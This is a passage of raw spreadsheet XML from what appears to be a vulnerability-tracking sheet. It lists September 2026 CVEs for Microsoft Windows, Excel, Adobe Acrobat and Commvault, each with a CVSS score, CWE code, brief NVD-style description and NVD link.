t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P625" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q625" s="5" t="inlineStr" /><c r="R625" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S625" s="5" t="inlineStr"><is><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is></c><c r="T625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t></is></c></row><row r="626"><c r="A626" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C626" s="5" t="inlineStr"><is><t>CVE-2026-77091</t></is></c><c r="D626" s="5" t="n"><v>7.8</v></c><c r="E626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G626" s="5" t="inlineStr" /><c r="H626" s="5" t="n"><v>0.001</v></c><c r="I626" s="5" t="inlineStr" /><c r="J626" s="5" t="inlineStr" /><c r="K626" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L626" s="5" t="inlineStr" /><c r="M626" s="5" t="inlineStr" /><c r="N626" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P626" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q626" s="5" t="inlineStr" /><c r="R626" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S626" s="5" t="inlineStr"><is><t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t></is></c><c r="T626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t></is></c></row><row r="627"><c r="A627" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C627" s="5" t="inlineStr"><is><t>CVE-2026-77489</t></is></c><c r="D627" s="5" t="n"><v>7.8</v></c><c r="E627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F627" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G627" s="5" t="inlineStr" /><c r="H627" s="5" t="n"><v>0.003</v></c><c r="I627" s="5" t="inlineStr" /><c r="J627" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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27" s="5" t="inlineStr" /><c r="M627" s="5" t="inlineStr" /><c r="N627" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P627" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q627" s="5" t="inlineStr" /><c r="R627" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S627" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t></is></c></row><row r="628"><c r="A628" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C628" s="5" t="inlineStr"><is><t>CVE-2026-77500</t></is></c><c r="D628" s="5" t="n"><v>7.8</v></c><c r="E628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F628" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G628" s="5" t="inlineStr" /><c r="H628" s="5" t="n"><v>0.003</v></c><c r="I628" s="5" t="inlineStr" /><c r="J628" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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28" s="5" t="inlineStr" /><c r="M628" s="5" t="inlineStr" /><c r="N628" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P628" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q628" s="5" t="inlineStr" /><c r="R628" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S628" s="5" t="inlineStr"><is><t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t></is></c></row><row r="629"><c r="A629" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C629" s="5" t="inlineStr"><is><t>CVE-2026-77503</t></is></c><c r="D629" s="5" t="n"><v>7.8</v></c><c r="E629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G629" s="5" t="inlineStr" /><c r="H629" s="5" t="n"><v>0.002</v></c><c r="I629" s="5" t="inlineStr" /><c r="J629" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K62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29" s="5" t="inlineStr" /><c r="M629" s="5" t="inlineStr" /><c r="N629" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P629" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q629" s="5" t="inlineStr" /><c r="R629" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S629" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t></is></c></row><row r="630"><c r="A630" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C630" s="5" t="inlineStr"><is><t>CVE-2026-77904</t></is></c><c r="D630" s="5" t="n"><v>7.8</v></c><c r="E630" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F630" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G630" s="5" t="inlineStr" /><c r="H630" s="5" t="n"><v>0.002</v></c><c r="I630" s="5" t="inlineStr" /><c r="J630" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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30" s="5" t="inlineStr" /><c r="M630" s="5" t="inlineStr" /><c r="N630" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P630" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q630" s="5" t="inlineStr" /><c r="R630" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S630" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t></is></c></row><row r="631"><c r="A631" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C631" s="5" t="inlineStr"><is><t>CVE-2026-78447</t></is></c><c r="D631" s="5" t="n"><v>7.8</v></c><c r="E631" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F631" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G631" s="5" t="inlineStr" /><c r="H631" s="5" t="n"><v>0.002</v></c><c r="I631" s="5" t="inlineStr" /><c r="J631" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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31" s="5" t="inlineStr" /><c r="M631" s="5" t="inlineStr" /><c r="N631" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P631" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q631" s="5" t="inlineStr" /><c r="R631" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S631" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t></is></c></row><row r="632"><c r="A632" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C632" s="5" t="inlineStr"><is><t>CVE-2026-78448</t></is></c><c r="D632" s="5" t="n"><v>7.8</v></c><c r="E632" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F632" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G632" s="5" t="inlineStr" /><c r="H632" s="5" t="n"><v>0.002</v></c><c r="I632" s="5" t="inlineStr" /><c r="J632" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K63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32" s="5" t="inlineStr" /><c r="M632" s="5" t="inlineStr" /><c r="N632" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P632" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q632" s="5" t="inlineStr" /><c r="R632" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S632" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t></is></c></row><row r="633"><c r="A633" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C633" s="5" t="inlineStr"><is><t>CVE-2026-79907</t></is></c><c r="D633" s="5" t="n"><v>7.8</v></c><c r="E633" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F633" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G633" s="5" t="inlineStr" /><c r="H633" s="5" t="n"><v>0.002</v></c><c r="I633" s="5" t="inlineStr" /><c r="J633" s="5" t="inlineStr" /><c r="K633" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L633" s="5" t="inlineStr" /><c r="M633" s="5" t="inlineStr" /><c r="N633" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P633" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q633" s="5" t="inlineStr" /><c r="R633" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S633" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Double Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79907</t></is></c></row><row r="634"><c r="A634" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C634" s="5" t="inlineStr"><is><t>CVE-2026-79908</t></is></c><c r="D634" s="5" t="n"><v>7.8</v></c><c r="E634" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F634" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G634" s="5" t="inlineStr" /><c r="H634" s="5" t="n"><v>0.002</v></c><c r="I634" s="5" t="inlineStr" /><c r="J634" s="5" t="inlineStr" /><c r="K634" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L634" s="5" t="inlineStr" /><c r="M634" s="5" t="inlineStr" /><c r="N634" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P634" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q634" s="5" t="inlineStr" /><c r="R634" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S634" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79908</t></is></c></row><row r="635"><c r="A635" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C635" s="5" t="inlineStr"><is><t>CVE-2026-79909</t></is></c><c r="D635" s="5" t="n"><v>7.8</v></c><c r="E635" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F635" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G635" s="5" t="inlineStr" /><c r="H635" s="5" t="n"><v>0.002</v></c><c r="I635" s="5" t="inlineStr" /><c r="J635" s="5" t="inlineStr" /><c r="K635" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L635" s="5" t="inlineStr" /><c r="M635" s="5" t="inlineStr" /><c r="N635" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P635" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q635" s="5" t="inlineStr" /><c r="R635" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S635" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79909</t></is></c></row><row r="636"><c r="A636" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C636" s="5" t="inlineStr"><is><t>CVE-2026-80075</t></is></c><c r="D636" s="5" t="n"><v>7.8</v></c><c r="E636" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F636" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G636" s="5" t="inlineStr" /><c r="H636" s="5" t="n"><v>0.003</v></c><c r="I636" s="5" t="inlineStr" /><c r="J636" s="5" t="inlineStr" /><c r="K636" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L636" s="5" t="inlineStr" /><c r="M636" s="5" t="inlineStr" /><c r="N636" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P636" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q636" s="5" t="inlineStr" /><c r="R636" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S636" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t></is></c></row><row r="637"><c r="A637" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C637" s="5" t="inlineStr"><is><t>CVE-2026-80161</t></is></c><c r="D637" s="5" t="n"><v>7.8</v></c><c r="E637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F637" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G637" s="5" t="inlineStr" /><c r="H637" s="5" t="n"><v>0.002</v></c><c r="I637" s="5" t="inlineStr" /><c r="J637" s="5" t="inlineStr" /><c r="K637" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L637" s="5" t="inlineStr" /><c r="M637" s="5" t="inlineStr" /><c r="N637" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P637" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q637" s="5" t="inlineStr" /><c r="R637" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S637" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80161</t></is></c></row><row r="638"><c r="A638" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C638" s="5" t="inlineStr"><is><t>CVE-2026-81353</t></is></c><c r="D638" s="5" t="n"><v>7.8</v></c><c r="E638" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F638" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G638" s="5" t="inlineStr" /><c r="H638" s="5" t="n"><v>0.004</v></c><c r="I638" s="5" t="inlineStr" /><c r="J638" s="5" t="inlineStr" /><c r="K638" s="5" t="inlineStr"><is><t>microsoft:heif_image_extension</t></is></c><c r="L638" s="5" t="inlineStr" /><c r="M638" s="5" t="inlineStr" /><c r="N638" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P638" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q638" s="5" t="inlineStr" /><c r="R638" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S638" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t></is></c></row><row r="639"><c r="A639" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C639" s="5" t="inlineStr"><is><t>CVE-2026-81386</t></is></c><c r="D639" s="5" t="n"><v>7.8</v></c><c r="E639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F639" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G639" s="5" t="inlineStr" /><c r="H639" s="5" t="n"><v>0.003</v></c><c r="I639" s="5" t="inlineStr" /><c r="J639" s="5" t="inlineStr" /><c r="K639" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L639" s="5" t="inlineStr" /><c r="M639" s="5" t="inlineStr" /><c r="N639" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P639" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q639" s="5" t="inlineStr" /><c r="R639" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S639" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81386</t></is></c></row><row r="640"><c r="A640" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C640" s="5" t="inlineStr"><is><t>CVE-2026-81388</t></is></c><c r="D640" s="5" t="n"><v>7.8</v></c><c r="E640" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F640" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G640" s="5" t="inlineStr" /><c r="H640" s="5" t="n"><v>0.004</v></c><c r="I640" s="5" t="inlineStr" /><c r="J640" s="5" t="inlineStr" /><c r="K640" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L640" s="5" t="inlineStr" /><c r="M640" s="5" t="inlineStr" /><c r="N640" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P640" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q640" s="5" t="inlineStr" /><c r="R640" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S640" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81388</t></is></c></row><row r="641"><c r="A641" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C641" s="5" t="inlineStr"><is><t>CVE-2026-81396</t></is></c><c r="D641" s="5" t="n"><v>7.8</v></c><c r="E641" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F641" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G641" s="5" t="inlineStr" /><c r="H641" s="5" t="n"><v>0.004</v></c><c r="I641" s="5" t="inlineStr" /><c r="J641" s="5" t="inlineStr" /><c r="K641" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L641" s="5" t="inlineStr" /><c r="M641" s="5" t="inlineStr" /><c r="N641" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P641" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q641" s="5" t="inlineStr" /><c r="R641" s="5" t="inlineStr"><is><t>CWE-121, CWE-193</t></is></c><c r="S641" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T641" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81396</t></is></c></row><row r="642"><c r="A642" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B642" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C642" s="5" t="inlineStr"><is><t>CVE-2026-81397</t></is></c><c r="D642" s="5" t="n"><v>7.8</v></c><c r="E642" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F642" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G642" s="5" t="inlineStr" /><c r="H642" s="5" t="n"><v>0.004</v></c><c r="I642" s="5" t="inlineStr" /><c r="J642" s="5" t="inlineStr" /><c r="K642" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L642" s="5" t="inlineStr" /><c r="M642" s="5" t="inlineStr" /><c r="N642" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O642" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P642" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q642" s="5" t="inlineStr" /><c r="R642" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S642" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T642" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81397</t></is></c></row><row r="643"><c r="A643" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B643" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C643" s="5" t="inlineStr"><is><t>CVE-2026-81398</t></is></c><c r="D643" s="5" t="n"><v>7.8</v></c><c r="E643" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F643" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G643" s="5" t="inlineStr" /><c r="H643" s="5" t="n"><v>0.003</v></c><c r="I643" s="5" t="inlineStr" /><c r="J643" s="5" t="inlineStr" /><c r="K643" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L643" s="5" t="inlineStr" /><c r="M643" s="5" t="inlineStr" /><c r="N643" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O643" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P643" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q643" s="5" t="inlineStr" /><c r="R643" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S643" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T643" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t></is></c></row><row r="644"><c r="A644" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B644" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C644" s="5" t="inlineStr"><is><t>CVE-2026-81947</t></is></c><c r="D644" s="5" t="n"><v>7.8</v></c><c r="E644" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F644" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G644" s="5" t="inlineStr" /><c r="H644" s="5" t="n"><v>0.003</v></c><c r="I644" s="5" t="inlineStr" /><c r="J644" s="5" t="inlineStr" /><c r="K644" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L644" s="5" t="inlineStr" /><c r="M644" s="5" t="inlineStr" /><c r="N644" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O644" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P644" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q644" s="5" t="inlineStr" /><c r="R644" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S644" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T644" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t></is></c></row><row r="645"><c r="A645" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B645" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C645" s="5" t="inlineStr"><is><t>CVE-2026-81948</t></is></c><c r="D645" s="5" t="n"><v>7.8</v></c><c r="E645" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F645" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G645" s="5" t="inlineStr" /><c r="H645" s="5" t="n"><v>0.004</v></c><c r="I645" s="5" t="inlineStr" /><c r="J645" s="5" t="inlineStr" /><c r="K645" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L645" s="5" t="inlineStr" /><c r="M645" s="5" t="inlineStr" /><c r="N645" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O645" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P645" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q645" s="5" t="inlineStr" /><c r="R645" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S645" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T645" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t></is></c></row><row r="646"><c r="A646" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B646" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C646" s="5" t="inlineStr"><is><t>CVE-2026-81949</t></is></c><c r="D646" s="5" t="n"><v>7.8</v></c><c r="E646" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F646" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G646" s="5" t="inlineStr" /><c r="H646" s="5" t="n"><v>0.004</v></c><c r="I646" s="5" t="inlineStr" /><c r="J646" s="5" t="inlineStr" /><c r="K646" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L646" s="5" t="inlineStr" /><c r="M646" s="5" t="inlineStr" /><c r="N646" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O646" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P646" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q646" s="5" t="inlineStr" /><c r="R646" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S646" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t></is></c><c r="T646" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t></is></c></row><row r="647"><c r="A647" s="5" 